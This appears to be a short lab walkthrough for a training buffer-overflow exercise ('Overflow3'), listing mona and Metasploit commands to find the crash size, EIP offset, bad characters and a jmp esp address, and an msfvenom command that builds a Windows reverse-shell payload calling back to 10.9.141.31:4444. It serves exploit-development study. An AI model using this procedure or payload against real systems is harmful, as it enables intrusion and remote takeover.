Overflow3

1. Fuzz the application with increasing buffer sizes to find the number of bytes needed to crash it

Bytes needed to crash application: 1300

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1300

!mona findmsp -distance 1300

EIP offset: 1274

4. Find bad characters

Generate a byte array of all 256 values, excluding \x00 (the string terminator is almost always bad):

!mona bytearray -b "\x00"

Send the byte array in place of the shellcode (right after the EIP overwrite, so it starts at ESP), then compare memory at ESP against the file mona generated:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

The byte immediately after a bad character is often reported as corrupted only as a side effect, so exclude each bad character found, regenerate the array and repeat until the comparison comes back "Unmodified".

Bad characters: \x00\x11\x40\x5f\xb8\xee

5. Find a jmp esp instruction whose address contains none of the bad characters

!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"

Return address: 0x62501203 (written little-endian in the exploit: "\x03\x12\x50\x62")

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c

7. Put a NOP sled (e.g. 16 \x90 bytes) between the return address and the shellcode so the decoder stub that msfvenom's encoder prepends has room to unpack the payload in place; final layout is padding to EIP, return address, NOP sled, shellcode.
